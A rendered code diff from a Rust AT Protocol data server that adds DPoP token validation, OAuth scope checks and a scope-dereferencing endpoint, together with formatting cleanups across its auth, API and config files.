FROM session_tokens
···
772
id: id.to_string(),
773
created_at: created_at.to_rfc3339(),
774
expires_at: expires_at.to_rfc3339(),
775
+
is_current: current_jti.as_ref() == Some(&access_jti),
776
})
777
.collect();
778
(StatusCode::OK, Json(ListSessionsOutput { sessions })).into_response()
+123
-11
src/api/temp.rs
+123
-11
src/api/temp.rs
···
6
http::{HeaderMap, StatusCode},
7
response::{IntoResponse, Response},
8
};
9
-
use serde::Serialize;
10
use serde_json::json;
11
12
#[derive(Serialize)]
13
#[serde(rename_all = "camelCase")]
···
23
if let Some(token) =
24
extract_bearer_token_from_header(headers.get("Authorization").and_then(|h| h.to_str().ok()))
25
&& let Ok(user) = validate_bearer_token(&state.db, &token).await
26
-
&& user.is_oauth {
27
-
return (
28
-
StatusCode::FORBIDDEN,
29
-
Json(json!({
30
-
"error": "Forbidden",
31
-
"message": "OAuth credentials are not supported for this endpoint"
32
-
})),
33
-
)
34
-
.into_response();
35
-
}
36
Json(CheckSignupQueueOutput {
37
activated: true,
38
place_in_queue: None,
···
40
})
41
.into_response()
42
}
···
6
http::{HeaderMap, StatusCode},
7
response::{IntoResponse, Response},
8
};
9
+
use cid::Cid;
10
+
use jacquard_repo::storage::BlockStore;
11
+
use serde::{Deserialize, Serialize};
12
use serde_json::json;
13
+
use std::str::FromStr;
14
15
#[derive(Serialize)]
16
#[serde(rename_all = "camelCase")]
···
26
if let Some(token) =
27
extract_bearer_token_from_header(headers.get("Authorization").and_then(|h| h.to_str().ok()))
28
&& let Ok(user) = validate_bearer_token(&state.db, &token).await
29
+
&& user.is_oauth
30
+
{
31
+
return (
32
+
StatusCode::FORBIDDEN,
33
+
Json(json!({
34
+
"error": "Forbidden",
35
+
"message": "OAuth credentials are not supported for this endpoint"
36
+
})),
37
+
)
38
+
.into_response();
39
+
}
40
Json(CheckSignupQueueOutput {
41
activated: true,
42
place_in_queue: None,
···
44
})
45
.into_response()
46
}
47
+
48
+
#[derive(Deserialize)]
49
+
#[serde(rename_all = "camelCase")]
50
+
pub struct DereferenceScopeInput {
51
+
pub scope: String,
52
+
}
53
+
54
+
#[derive(Serialize)]
55
+
#[serde(rename_all = "camelCase")]
56
+
pub struct DereferenceScopeOutput {
57
+
pub scope: String,
58
+
}
59
+
60
+
pub async fn dereference_scope(
61
+
State(state): State<AppState>,
62
+
headers: HeaderMap,
63
+
Json(input): Json<DereferenceScopeInput>,
64
+
) -> Response {
65
+
let token = match extract_bearer_token_from_header(
66
+
headers.get("Authorization").and_then(|h| h.to_str().ok()),
67
+
) {
68
+
Some(t) => t,
69
+
None => {
70
+
return (
71
+
StatusCode::UNAUTHORIZED,
72
+
Json(json!({"error": "AuthenticationRequired"})),
73
+
)
74
+
.into_response();
75
+
}
76
+
};
77
+
78
+
if validate_bearer_token(&state.db, &token).await.is_err() {
79
+
return (
80
+
StatusCode::UNAUTHORIZED,
81
+
Json(json!({"error": "AuthenticationFailed"})),
82
+
)
83
+
.into_response();
84
+
}
85
+
86
+
let scope_parts: Vec<&str> = input.scope.split_whitespace().collect();
87
+
let mut resolved_scopes: Vec<String> = Vec::new();
88
+
89
+
for part in scope_parts {
90
+
if let Some(cid_str) = part.strip_prefix("ref:") {
91
+
let cache_key = format!("scope_ref:{}", cid_str);
92
+
if let Some(cached) = state.cache.get(&cache_key).await {
93
+
for s in cached.split_whitespace() {
94
+
if !resolved_scopes.contains(&s.to_string()) {
95
+
resolved_scopes.push(s.to_string());
96
+
}
97
+
}
98
+
continue;
99
+
}
100
+
101
+
let cid = match Cid::from_str(cid_str) {
102
+
Ok(c) => c,
103
+
Err(_) => {
104
+
tracing::warn!("Invalid CID in scope ref: {}", cid_str);
105
+
continue;
106
+
}
107
+
};
108
+
109
+
let block_bytes = match state.block_store.get(&cid).await {
110
+
Ok(Some(b)) => b,
111
+
Ok(None) => {
112
+
tracing::warn!("Scope ref block not found: {}", cid_str);
113
+
continue;
114
+
}
115
+
Err(e) => {
116
+
tracing::warn!("Error fetching scope ref block {}: {:?}", cid_str, e);
117
+
continue;
118
+
}
119
+
};
120
+
121
+
let scope_record: serde_json::Value = match serde_ipld_dagcbor::from_slice(&block_bytes)
122
+
{
123
+
Ok(v) => v,
124
+
Err(e) => {
125
+
tracing::warn!("Failed to decode scope ref block {}: {:?}", cid_str, e);
126
+
continue;
127
+
}
128
+
};
129
+
130
+
if let Some(scope_value) = scope_record.get("scope").and_then(|v| v.as_str()) {
131
+
let _ = state
132
+
.cache
133
+
.set(
134
+
&cache_key,
135
+
scope_value,
136
+
std::time::Duration::from_secs(3600),
137
+
)
138
+
.await;
139
+
for s in scope_value.split_whitespace() {
140
+
if !resolved_scopes.contains(&s.to_string()) {
141
+
resolved_scopes.push(s.to_string());
142
+
}
143
+
}
144
+
}
145
+
} else if !resolved_scopes.contains(&part.to_string()) {
146
+
resolved_scopes.push(part.to_string());
147
+
}
148
+
}
149
+
150
+
Json(DereferenceScopeOutput {
151
+
scope: resolved_scopes.join(" "),
152
+
})
153
+
.into_response()
154
+
}
+31
-21
src/api/verification.rs
+31
-21
src/api/verification.rs
···
49
.await
50
{
51
Ok(id) => id,
52
-
Err(_) => return (
53
-
StatusCode::INTERNAL_SERVER_ERROR,
54
-
Json(json!({"error": "InternalError", "message": "User not found"})),
55
-
)
56
-
.into_response(),
57
};
58
59
let channel_str = input.channel.as_str();
···
88
.into_response(),
89
};
90
91
-
let pending_identifier = match record.pending_identifier {
92
-
Some(p) => p,
93
-
None => return (
94
-
StatusCode::BAD_REQUEST,
95
-
Json(json!({"error": "InvalidRequest", "message": "No pending identifier found"})),
96
-
)
97
-
.into_response(),
98
-
};
99
100
if record.expires_at < Utc::now() {
101
return (
···
115
116
let mut tx = match state.db.begin().await {
117
Ok(tx) => tx,
118
-
Err(_) => return (
119
-
StatusCode::INTERNAL_SERVER_ERROR,
120
-
Json(json!({"error": "InternalError"})),
121
-
)
122
-
.into_response(),
123
};
124
125
let update_result = match channel_str {
···
148
149
if let Err(e) = update_result {
150
error!("Failed to update user channel: {:?}", e);
151
-
if channel_str == "email" && e.as_database_error().map(|db| db.is_unique_violation()).unwrap_or(false) {
152
return (
153
StatusCode::BAD_REQUEST,
154
Json(json!({"error": "EmailTaken", "message": "Email already in use"})),
···
168
channel_str as _
169
)
170
.execute(&mut *tx)
171
-
.await {
172
error!("Failed to delete verification record: {:?}", e);
173
return (
174
StatusCode::INTERNAL_SERVER_ERROR,
···
177
.into_response();
178
}
179
180
-
if let Err(_) = tx.commit().await {
181
return (
182
StatusCode::INTERNAL_SERVER_ERROR,
183
Json(json!({"error": "InternalError"})),
···
49
.await
50
{
51
Ok(id) => id,
52
+
Err(_) => {
53
+
return (
54
+
StatusCode::INTERNAL_SERVER_ERROR,
55
+
Json(json!({"error": "InternalError", "message": "User not found"})),
56
+
)
57
+
.into_response();
58
+
}
59
};
60
61
let channel_str = input.channel.as_str();
···
90
.into_response(),
91
};
92
93
+
let pending_identifier =
94
+
match record.pending_identifier {
95
+
Some(p) => p,
96
+
None => return (
97
+
StatusCode::BAD_REQUEST,
98
+
Json(json!({"error": "InvalidRequest", "message": "No pending identifier found"})),
99
+
)
100
+
.into_response(),
101
+
};
102
103
if record.expires_at < Utc::now() {
104
return (
···
118
119
let mut tx = match state.db.begin().await {
120
Ok(tx) => tx,
121
+
Err(_) => {
122
+
return (
123
+
StatusCode::INTERNAL_SERVER_ERROR,
124
+
Json(json!({"error": "InternalError"})),
125
+
)
126
+
.into_response();
127
+
}
128
};
129
130
let update_result = match channel_str {
···
153
154
if let Err(e) = update_result {
155
error!("Failed to update user channel: {:?}", e);
156
+
if channel_str == "email"
157
+
&& e.as_database_error()
158
+
.map(|db| db.is_unique_violation())
159
+
.unwrap_or(false)
160
+
{
161
return (
162
StatusCode::BAD_REQUEST,
163
Json(json!({"error": "EmailTaken", "message": "Email already in use"})),
···
177
channel_str as _
178
)
179
.execute(&mut *tx)
180
+
.await
181
+
{
182
error!("Failed to delete verification record: {:?}", e);
183
return (
184
StatusCode::INTERNAL_SERVER_ERROR,
···
187
.into_response();
188
}
189
190
+
if tx.commit().await.is_err() {
191
return (
192
StatusCode::INTERNAL_SERVER_ERROR,
193
Json(json!({"error": "InternalError"})),
+18
-18
src/appview/mod.rs
+18
-18
src/appview/mod.rs
···
83
pub async fn resolve_did(&self, did: &str) -> Option<ResolvedService> {
84
{
85
let cache = self.did_cache.read().await;
86
-
if let Some(cached) = cache.get(did) {
87
-
if cached.resolved_at.elapsed() < self.cache_ttl {
88
-
return Some(ResolvedService {
89
-
url: cached.url.clone(),
90
-
did: cached.did.clone(),
91
-
});
92
-
}
93
}
94
}
95
···
240
}
241
}
242
243
-
if let Some(service) = doc.service.first() {
244
-
if service.service_endpoint.starts_with("http") {
245
-
warn!(
246
-
"No explicit AppView service found for {}, using first service: {}",
247
-
doc.id, service.service_endpoint
248
-
);
249
-
return Some(ResolvedService {
250
-
url: service.service_endpoint.clone(),
251
-
did: doc.id.clone(),
252
-
});
253
-
}
254
}
255
256
if doc.id.starts_with("did:web:") {
···
83
pub async fn resolve_did(&self, did: &str) -> Option<ResolvedService> {
84
{
85
let cache = self.did_cache.read().await;
86
+
if let Some(cached) = cache.get(did)
87
+
&& cached.resolved_at.elapsed() < self.cache_ttl
88
+
{
89
+
return Some(ResolvedService {
90
+
url: cached.url.clone(),
91
+
did: cached.did.clone(),
92
+
});
93
}
94
}
95
···
240
}
241
}
242
243
+
if let Some(service) = doc.service.first()
244
+
&& service.service_endpoint.starts_with("http")
245
+
{
246
+
warn!(
247
+
"No explicit AppView service found for {}, using first service: {}",
248
+
doc.id, service.service_endpoint
249
+
);
250
+
return Some(ResolvedService {
251
+
url: service.service_endpoint.clone(),
252
+
did: doc.id.clone(),
253
+
});
254
}
255
256
if doc.id.starts_with("did:web:") {
+107
-21
src/auth/extractor.rs
+107
-21
src/auth/extractor.rs
···
8
9
use super::{
10
AuthenticatedUser, TokenValidationError, validate_bearer_token_cached,
11
-
validate_bearer_token_cached_allow_deactivated,
12
};
13
use crate::state::AppState;
14
···
63
}
64
}
65
66
fn extract_bearer_token(auth_header: &str) -> Result<&str, AuthError> {
67
let auth_header = auth_header.trim();
68
···
151
.to_str()
152
.map_err(|_| AuthError::InvalidFormat)?;
153
154
-
let token = extract_bearer_token(auth_header)?;
155
156
-
match validate_bearer_token_cached(&state.db, &state.cache, token).await {
157
-
Ok(user) => Ok(BearerAuth(user)),
158
-
Err(TokenValidationError::AccountDeactivated) => Err(AuthError::AccountDeactivated),
159
-
Err(TokenValidationError::AccountTakedown) => Err(AuthError::AccountTakedown),
160
-
Err(_) => Err(AuthError::AuthenticationFailed),
161
}
162
}
163
}
···
178
.to_str()
179
.map_err(|_| AuthError::InvalidFormat)?;
180
181
-
let token = extract_bearer_token(auth_header)?;
182
183
-
match validate_bearer_token_cached_allow_deactivated(&state.db, &state.cache, token).await {
184
-
Ok(user) => Ok(BearerAuthAllowDeactivated(user)),
185
-
Err(TokenValidationError::AccountTakedown) => Err(AuthError::AccountTakedown),
186
-
Err(_) => Err(AuthError::AuthenticationFailed),
187
}
188
}
189
}
···
204
.to_str()
205
.map_err(|_| AuthError::InvalidFormat)?;
206
207
-
let token = extract_bearer_token(auth_header)?;
208
209
-
match validate_bearer_token_cached(&state.db, &state.cache, token).await {
210
-
Ok(user) => {
211
-
if !user.is_admin {
212
-
return Err(AuthError::AdminRequired);
213
}
214
-
Ok(BearerAuthAdmin(user))
215
}
216
-
Err(TokenValidationError::AccountDeactivated) => Err(AuthError::AccountDeactivated),
217
-
Err(TokenValidationError::AccountTakedown) => Err(AuthError::AccountTakedown),
218
-
Err(_) => Err(AuthError::AuthenticationFailed),
219
}
220
}
221
}
222
···
8
9
use super::{
10
AuthenticatedUser, TokenValidationError, validate_bearer_token_cached,
11
+
validate_bearer_token_cached_allow_deactivated, validate_token_with_dpop,
12
};
13
use crate::state::AppState;
14
···
63
}
64
}
65
66
+
#[cfg(test)]
67
fn extract_bearer_token(auth_header: &str) -> Result<&str, AuthError> {
68
let auth_header = auth_header.trim();
69
···
152
.to_str()
153
.map_err(|_| AuthError::InvalidFormat)?;
154
155
+
let extracted =
156
+
extract_auth_token_from_header(Some(auth_header)).ok_or(AuthError::InvalidFormat)?;
157
+
158
+
if extracted.is_dpop {
159
+
let dpop_proof = parts.headers.get("dpop").and_then(|h| h.to_str().ok());
160
+
let method = parts.method.as_str();
161
+
let uri = parts.uri.to_string();
162
163
+
match validate_token_with_dpop(
164
+
&state.db,
165
+
&extracted.token,
166
+
true,
167
+
dpop_proof,
168
+
method,
169
+
&uri,
170
+
false,
171
+
)
172
+
.await
173
+
{
174
+
Ok(user) => Ok(BearerAuth(user)),
175
+
Err(TokenValidationError::AccountDeactivated) => Err(AuthError::AccountDeactivated),
176
+
Err(TokenValidationError::AccountTakedown) => Err(AuthError::AccountTakedown),
177
+
Err(_) => Err(AuthError::AuthenticationFailed),
178
+
}
179
+
} else {
180
+
match validate_bearer_token_cached(&state.db, &state.cache, &extracted.token).await {
181
+
Ok(user) => Ok(BearerAuth(user)),
182
+
Err(TokenValidationError::AccountDeactivated) => Err(AuthError::AccountDeactivated),
183
+
Err(TokenValidationError::AccountTakedown) => Err(AuthError::AccountTakedown),
184
+
Err(_) => Err(AuthError::AuthenticationFailed),
185
+
}
186
}
187
}
188
}
···
203
.to_str()
204
.map_err(|_| AuthError::InvalidFormat)?;
205
206
+
let extracted =
207
+
extract_auth_token_from_header(Some(auth_header)).ok_or(AuthError::InvalidFormat)?;
208
209
+
if extracted.is_dpop {
210
+
let dpop_proof = parts.headers.get("dpop").and_then(|h| h.to_str().ok());
211
+
let method = parts.method.as_str();
212
+
let uri = parts.uri.to_string();
213
+
214
+
match validate_token_with_dpop(
215
+
&state.db,
216
+
&extracted.token,
217
+
true,
218
+
dpop_proof,
219
+
method,
220
+
&uri,
221
+
true,
222
+
)
223
+
.await
224
+
{
225
+
Ok(user) => Ok(BearerAuthAllowDeactivated(user)),
226
+
Err(TokenValidationError::AccountTakedown) => Err(AuthError::AccountTakedown),
227
+
Err(_) => Err(AuthError::AuthenticationFailed),
228
+
}
229
+
} else {
230
+
match validate_bearer_token_cached_allow_deactivated(
231
+
&state.db,
232
+
&state.cache,
233
+
&extracted.token,
234
+
)
235
+
.await
236
+
{
237
+
Ok(user) => Ok(BearerAuthAllowDeactivated(user)),
238
+
Err(TokenValidationError::AccountTakedown) => Err(AuthError::AccountTakedown),
239
+
Err(_) => Err(AuthError::AuthenticationFailed),
240
+
}
241
}
242
}
243
}
···
258
.to_str()
259
.map_err(|_| AuthError::InvalidFormat)?;
260
261
+
let extracted =
262
+
extract_auth_token_from_header(Some(auth_header)).ok_or(AuthError::InvalidFormat)?;
263
264
+
let user = if extracted.is_dpop {
265
+
let dpop_proof = parts.headers.get("dpop").and_then(|h| h.to_str().ok());
266
+
let method = parts.method.as_str();
267
+
let uri = parts.uri.to_string();
268
+
269
+
match validate_token_with_dpop(
270
+
&state.db,
271
+
&extracted.token,
272
+
true,
273
+
dpop_proof,
274
+
method,
275
+
&uri,
276
+
false,
277
+
)
278
+
.await
279
+
{
280
+
Ok(user) => user,
281
+
Err(TokenValidationError::AccountDeactivated) => {
282
+
return Err(AuthError::AccountDeactivated);
283
}
284
+
Err(TokenValidationError::AccountTakedown) => {
285
+
return Err(AuthError::AccountTakedown);
286
+
}
287
+
Err(_) => return Err(AuthError::AuthenticationFailed),
288
}
289
+
} else {
290
+
match validate_bearer_token_cached(&state.db, &state.cache, &extracted.token).await {
291
+
Ok(user) => user,
292
+
Err(TokenValidationError::AccountDeactivated) => {
293
+
return Err(AuthError::AccountDeactivated);
294
+
}
295
+
Err(TokenValidationError::AccountTakedown) => {
296
+
return Err(AuthError::AccountTakedown);
297
+
}
298
+
Err(_) => return Err(AuthError::AuthenticationFailed),
299
+
}
300
+
};
301
+
302
+
if !user.is_admin {
303
+
return Err(AuthError::AdminRequired);
304
}
305
+
Ok(BearerAuthAdmin(user))
306
}
307
}
308
+65
-38
src/auth/mod.rs
+65
-38
src/auth/mod.rs
···
5
use std::time::Duration;
6
7
use crate::cache::Cache;
8
9
pub mod extractor;
10
pub mod service;
11
pub mod token;
12
pub mod verify;
···
15
AuthError, BearerAuth, BearerAuthAdmin, BearerAuthAllowDeactivated, ExtractedToken,
16
extract_auth_token_from_header, extract_bearer_token_from_header,
17
};
18
pub use token::{
19
SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED, SCOPE_REFRESH, TOKEN_TYPE_ACCESS,
20
TOKEN_TYPE_REFRESH, TOKEN_TYPE_SERVICE, TokenWithMetadata, create_access_token,
···
24
pub use verify::{
25
get_did_from_token, get_jti_from_token, verify_access_token, verify_refresh_token, verify_token,
26
};
27
-
pub use service::{ServiceTokenClaims, ServiceTokenVerifier, is_service_token};
28
29
const KEY_CACHE_TTL_SECS: u64 = 300;
30
const SESSION_CACHE_TTL_SECS: u64 = 60;
···
53
pub key_bytes: Option<Vec<u8>>,
54
pub is_oauth: bool,
55
pub is_admin: bool,
56
}
57
58
pub async fn validate_bearer_token(
···
114
}
115
}
116
117
-
let (decrypted_key, deactivated_at, takedown_ref, is_admin) = if let Some(key) = cached_key {
118
let user_status = sqlx::query!(
119
"SELECT deactivated_at, takedown_ref, is_admin FROM users WHERE did = $1",
120
did
···
125
.flatten();
126
127
match user_status {
128
-
Some(status) => (Some(key), status.deactivated_at, status.takedown_ref, status.is_admin),
129
None => (None, None, None, false),
130
}
131
} else if let Some(user) = sqlx::query!(
···
153
.await;
154
}
155
156
-
(Some(key), user.deactivated_at, user.takedown_ref, user.is_admin)
157
} else {
158
(None, None, None, false)
159
};
···
194
195
session_valid = session_exists.is_some();
196
197
-
if session_valid
198
-
&& let Some(c) = cache {
199
-
let _ = c
200
-
.set(
201
-
&session_cache_key,
202
-
"1",
203
-
Duration::from_secs(SESSION_CACHE_TTL_SECS),
204
-
)
205
-
.await;
206
-
}
207
}
208
209
if session_valid {
···
212
key_bytes: Some(decrypted_key),
213
is_oauth: false,
214
is_admin,
215
});
216
}
217
}
···
232
.await
233
.ok()
234
.flatten()
235
-
{
236
-
if !allow_deactivated && oauth_token.deactivated_at.is_some() {
237
-
return Err(TokenValidationError::AccountDeactivated);
238
-
}
239
240
-
if oauth_token.takedown_ref.is_some() {
241
-
return Err(TokenValidationError::AccountTakedown);
242
-
}
243
244
-
let now = chrono::Utc::now();
245
-
if oauth_token.expires_at > now {
246
-
let key_bytes = if let (Some(kb), Some(ev)) =
247
-
(&oauth_token.key_bytes, oauth_token.encryption_version)
248
-
{
249
-
crate::config::decrypt_key(kb, Some(ev)).ok()
250
-
} else {
251
-
None
252
-
};
253
-
return Ok(AuthenticatedUser {
254
-
did: oauth_token.did,
255
-
key_bytes,
256
-
is_oauth: true,
257
-
is_admin: oauth_token.is_admin,
258
-
});
259
-
}
260
}
261
262
Err(TokenValidationError::AuthenticationFailed)
263
}
···
314
if user_info.takedown_ref.is_some() {
315
return Err(TokenValidationError::AccountTakedown);
316
}
317
-
let key_bytes = if let (Some(kb), Some(ev)) = (&user_info.key_bytes, user_info.encryption_version) {
318
crate::config::decrypt_key(kb, Some(ev)).ok()
319
} else {
320
None
···
324
key_bytes,
325
is_oauth: true,
326
is_admin: user_info.is_admin,
327
})
328
}
329
Err(_) => Err(TokenValidationError::AuthenticationFailed),
···
5
use std::time::Duration;
6
7
use crate::cache::Cache;
8
+
use crate::oauth::scopes::ScopePermissions;
9
10
pub mod extractor;
11
+
pub mod scope_check;
12
pub mod service;
13
pub mod token;
14
pub mod verify;
···
17
AuthError, BearerAuth, BearerAuthAdmin, BearerAuthAllowDeactivated, ExtractedToken,
18
extract_auth_token_from_header, extract_bearer_token_from_header,
19
};
20
+
pub use service::{ServiceTokenClaims, ServiceTokenVerifier, is_service_token};
21
pub use token::{
22
SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED, SCOPE_REFRESH, TOKEN_TYPE_ACCESS,
23
TOKEN_TYPE_REFRESH, TOKEN_TYPE_SERVICE, TokenWithMetadata, create_access_token,
···
27
pub use verify::{
28
get_did_from_token, get_jti_from_token, verify_access_token, verify_refresh_token, verify_token,
29
};
30
31
const KEY_CACHE_TTL_SECS: u64 = 300;
32
const SESSION_CACHE_TTL_SECS: u64 = 60;
···
55
pub key_bytes: Option<Vec<u8>>,
56
pub is_oauth: bool,
57
pub is_admin: bool,
58
+
pub scope: Option<String>,
59
+
}
60
+
61
+
impl AuthenticatedUser {
62
+
pub fn permissions(&self) -> ScopePermissions {
63
+
if !self.is_oauth {
64
+
return ScopePermissions::from_scope_string(Some("atproto"));
65
+
}
66
+
ScopePermissions::from_scope_string(self.scope.as_deref())
67
+
}
68
}
69
70
pub async fn validate_bearer_token(
···
126
}
127
}
128
129
+
let (decrypted_key, deactivated_at, takedown_ref, is_admin) = if let Some(key) = cached_key
130
+
{
131
let user_status = sqlx::query!(
132
"SELECT deactivated_at, takedown_ref, is_admin FROM users WHERE did = $1",
133
did
···
138
.flatten();
139
140
match user_status {
141
+
Some(status) => (
142
+
Some(key),
143
+
status.deactivated_at,
144
+
status.takedown_ref,
145
+
status.is_admin,
146
+
),
147
None => (None, None, None, false),
148
}
149
} else if let Some(user) = sqlx::query!(
···
171
.await;
172
}
173
174
+
(
175
+
Some(key),
176
+
user.deactivated_at,
177
+
user.takedown_ref,
178
+
user.is_admin,
179
+
)
180
} else {
181
(None, None, None, false)
182
};
···
217
218
session_valid = session_exists.is_some();
219
220
+
if session_valid && let Some(c) = cache {
221
+
let _ = c
222
+
.set(
223
+
&session_cache_key,
224
+
"1",
225
+
Duration::from_secs(SESSION_CACHE_TTL_SECS),
226
+
)
227
+
.await;
228
+
}
229
}
230
231
if session_valid {
···
234
key_bytes: Some(decrypted_key),
235
is_oauth: false,
236
is_admin,
237
+
scope: None,
238
});
239
}
240
}
···
255
.await
256
.ok()
257
.flatten()
258
+
{
259
+
if !allow_deactivated && oauth_token.deactivated_at.is_some() {
260
+
return Err(TokenValidationError::AccountDeactivated);
261
+
}
262
263
+
if oauth_token.takedown_ref.is_some() {
264
+
return Err(TokenValidationError::AccountTakedown);
265
+
}
266
267
+
let now = chrono::Utc::now();
268
+
if oauth_token.expires_at > now {
269
+
let key_bytes = if let (Some(kb), Some(ev)) =
270
+
(&oauth_token.key_bytes, oauth_token.encryption_version)
271
+
{
272
+
crate::config::decrypt_key(kb, Some(ev)).ok()
273
+
} else {
274
+
None
275
+
};
276
+
return Ok(AuthenticatedUser {
277
+
did: oauth_token.did,
278
+
key_bytes,
279
+
is_oauth: true,
280
+
is_admin: oauth_token.is_admin,
281
+
scope: oauth_info.scope,
282
+
});
283
}
284
+
}
285
286
Err(TokenValidationError::AuthenticationFailed)
287
}
···
338
if user_info.takedown_ref.is_some() {
339
return Err(TokenValidationError::AccountTakedown);
340
}
341
+
let key_bytes = if let (Some(kb), Some(ev)) =
342
+
(&user_info.key_bytes, user_info.encryption_version)
343
+
{
344
crate::config::decrypt_key(kb, Some(ev)).ok()
345
} else {
346
None
···
350
key_bytes,
351
is_oauth: true,
352
is_admin: user_info.is_admin,
353
+
scope: result.scope,
354
})
355
}
356
Err(_) => Err(TokenValidationError::AuthenticationFailed),
+118
src/auth/scope_check.rs
+118
src/auth/scope_check.rs
···
···
1
+
#![allow(clippy::result_large_err)]
2
+
3
+
use axum::http::StatusCode;
4
+
use axum::response::{IntoResponse, Response};
5
+
use serde_json::json;
6
+
7
+
use crate::oauth::scopes::{
8
+
AccountAction, AccountAttr, IdentityAttr, RepoAction, ScopePermissions,
9
+
};
10
+
11
+
pub fn check_repo_scope(
12
+
is_oauth: bool,
13
+
scope: Option<&str>,
14
+
action: RepoAction,
15
+
collection: &str,
16
+
) -> Result<(), Response> {
17
+
if !is_oauth {
18
+
return Ok(());
19
+
}
20
+
21
+
let permissions = ScopePermissions::from_scope_string(scope);
22
+
permissions.assert_repo(action, collection).map_err(|e| {
23
+
(
24
+
StatusCode::FORBIDDEN,
25
+
axum::Json(json!({
26
+
"error": "InsufficientScope",
27
+
"message": e.to_string()
28
+
})),
29
+
)
30
+
.into_response()
31
+
})
32
+
}
33
+
34
+
pub fn check_blob_scope(is_oauth: bool, scope: Option<&str>, mime: &str) -> Result<(), Response> {
35
+
if !is_oauth {
36
+
return Ok(());
37
+
}
38
+
39
+
let permissions = ScopePermissions::from_scope_string(scope);
40
+
permissions.assert_blob(mime).map_err(|e| {
41
+
(
42
+
StatusCode::FORBIDDEN,
43
+
axum::Json(json!({
44
+
"error": "InsufficientScope",
45
+
"message": e.to_string()
46
+
})),
47
+
)
48
+
.into_response()
49
+
})
50
+
}
51
+
52
+
pub fn check_rpc_scope(
53
+
is_oauth: bool,
54
+
scope: Option<&str>,
55
+
aud: &str,
56
+
lxm: &str,
57
+
) -> Result<(), Response> {
58
+
if !is_oauth {
59
+
return Ok(());
60
+
}
61
+
62
+
let permissions = ScopePermissions::from_scope_string(scope);
63
+
permissions.assert_rpc(aud, lxm).map_err(|e| {
64
+
(
65
+
StatusCode::FORBIDDEN,
66
+
axum::Json(json!({
67
+
"error": "InsufficientScope",
68
+
"message": e.to_string()
69
+
})),
70
+
)
71
+
.into_response()
72
+
})
73
+
}
74
+
75
+
pub fn check_account_scope(
76
+
is_oauth: bool,
77
+
scope: Option<&str>,
78
+
attr: AccountAttr,
79
+
action: AccountAction,
80
+
) -> Result<(), Response> {
81
+
if !is_oauth {
82
+
return Ok(());
83
+
}
84
+
85
+
let permissions = ScopePermissions::from_scope_string(scope);
86
+
permissions.assert_account(attr, action).map_err(|e| {
87
+
(
88
+
StatusCode::FORBIDDEN,
89
+
axum::Json(json!({
90
+
"error": "InsufficientScope",
91
+
"message": e.to_string()
92
+
})),
93
+
)
94
+
.into_response()
95
+
})
96
+
}
97
+
98
+
pub fn check_identity_scope(
99
+
is_oauth: bool,
100
+
scope: Option<&str>,
101
+
attr: IdentityAttr,
102
+
) -> Result<(), Response> {
103
+
if !is_oauth {
104
+
return Ok(());
105
+
}
106
+
107
+
let permissions = ScopePermissions::from_scope_string(scope);
108
+
permissions.assert_identity(attr).map_err(|e| {
109
+
(
110
+
StatusCode::FORBIDDEN,
111
+
axum::Json(json!({
112
+
"error": "InsufficientScope",
113
+
"message": e.to_string()
114
+
})),
115
+
)
116
+
.into_response()
117
+
})
118
+
}
+6
-5
src/auth/service.rs
+6
-5
src/auth/service.rs
···
278
279
fn parse_did_key_multibase(multibase: &str) -> Result<VerifyingKey> {
280
if !multibase.starts_with('z') {
281
-
return Err(anyhow!("Expected base58btc multibase encoding (starts with 'z')"));
282
}
283
284
-
let (_, decoded) = multibase::decode(multibase)
285
-
.map_err(|e| anyhow!("Failed to decode multibase: {}", e))?;
286
287
if decoded.len() < 2 {
288
return Err(anyhow!("Invalid multicodec data"));
···
302
return Err(anyhow!("Only secp256k1 keys are supported"));
303
}
304
305
-
VerifyingKey::from_sec1_bytes(key_bytes)
306
-
.map_err(|e| anyhow!("Invalid public key: {}", e))
307
}
308
309
pub fn is_service_token(token: &str) -> bool {
···
278
279
fn parse_did_key_multibase(multibase: &str) -> Result<VerifyingKey> {
280
if !multibase.starts_with('z') {
281
+
return Err(anyhow!(
282
+
"Expected base58btc multibase encoding (starts with 'z')"
283
+
));
284
}
285
286
+
let (_, decoded) =
287
+
multibase::decode(multibase).map_err(|e| anyhow!("Failed to decode multibase: {}", e))?;
288
289
if decoded.len() < 2 {
290
return Err(anyhow!("Invalid multicodec data"));
···
304
return Err(anyhow!("Only secp256k1 keys are supported"));
305
}
306
307
+
VerifyingKey::from_sec1_bytes(key_bytes).map_err(|e| anyhow!("Invalid public key: {}", e))
308
}
309
310
pub fn is_service_token(token: &str) -> bool {
+16
-14
src/auth/verify.rs
+16
-14
src/auth/verify.rs
···
113
serde_json::from_slice(&header_bytes).context("JSON decode of header failed")?;
114
115
if let Some(expected) = expected_typ
116
-
&& header.typ != expected {
117
-
return Err(anyhow!(
118
-
"Invalid token type: expected {}, got {}",
119
-
expected,
120
-
header.typ
121
-
));
122
-
}
123
124
let signature_bytes = URL_SAFE_NO_PAD
125
.decode(signature_b64)
···
185
}
186
187
if let Some(expected) = expected_typ
188
-
&& header.typ != expected {
189
-
return Err(anyhow!(
190
-
"Invalid token type: expected {}, got {}",
191
-
expected,
192
-
header.typ
193
-
));
194
-
}
195
196
let signature_bytes = URL_SAFE_NO_PAD
197
.decode(signature_b64)
···
113
serde_json::from_slice(&header_bytes).context("JSON decode of header failed")?;
114
115
if let Some(expected) = expected_typ
116
+
&& header.typ != expected
117
+
{
118
+
return Err(anyhow!(
119
+
"Invalid token type: expected {}, got {}",
120
+
expected,
121
+
header.typ
122
+
));
123
+
}
124
125
let signature_bytes = URL_SAFE_NO_PAD
126
.decode(signature_b64)
···
186
}
187
188
if let Some(expected) = expected_typ
189
+
&& header.typ != expected
190
+
{
191
+
return Err(anyhow!(
192
+
"Invalid token type: expected {}, got {}",
193
+
expected,
194
+
header.typ
195
+
));
196
+
}
197
198
let signature_bytes = URL_SAFE_NO_PAD
199
.decode(signature_b64)
+2
-2
src/comms/mod.rs
+2
-2
src/comms/mod.rs
+2
-1
src/comms/sender.rs
+2
-1
src/comms/sender.rs
+1
-1
src/comms/service.rs
+1
-1
src/comms/service.rs
+9
-3
src/config.rs
+9
-3
src/config.rs
···
46
}
47
});
48
49
-
if jwt_secret.len() < 32 && std::env::var("TRANQUIL_PDS_ALLOW_INSECURE_SECRETS").is_err() {
50
panic!("JWT_SECRET must be at least 32 characters");
51
}
52
53
-
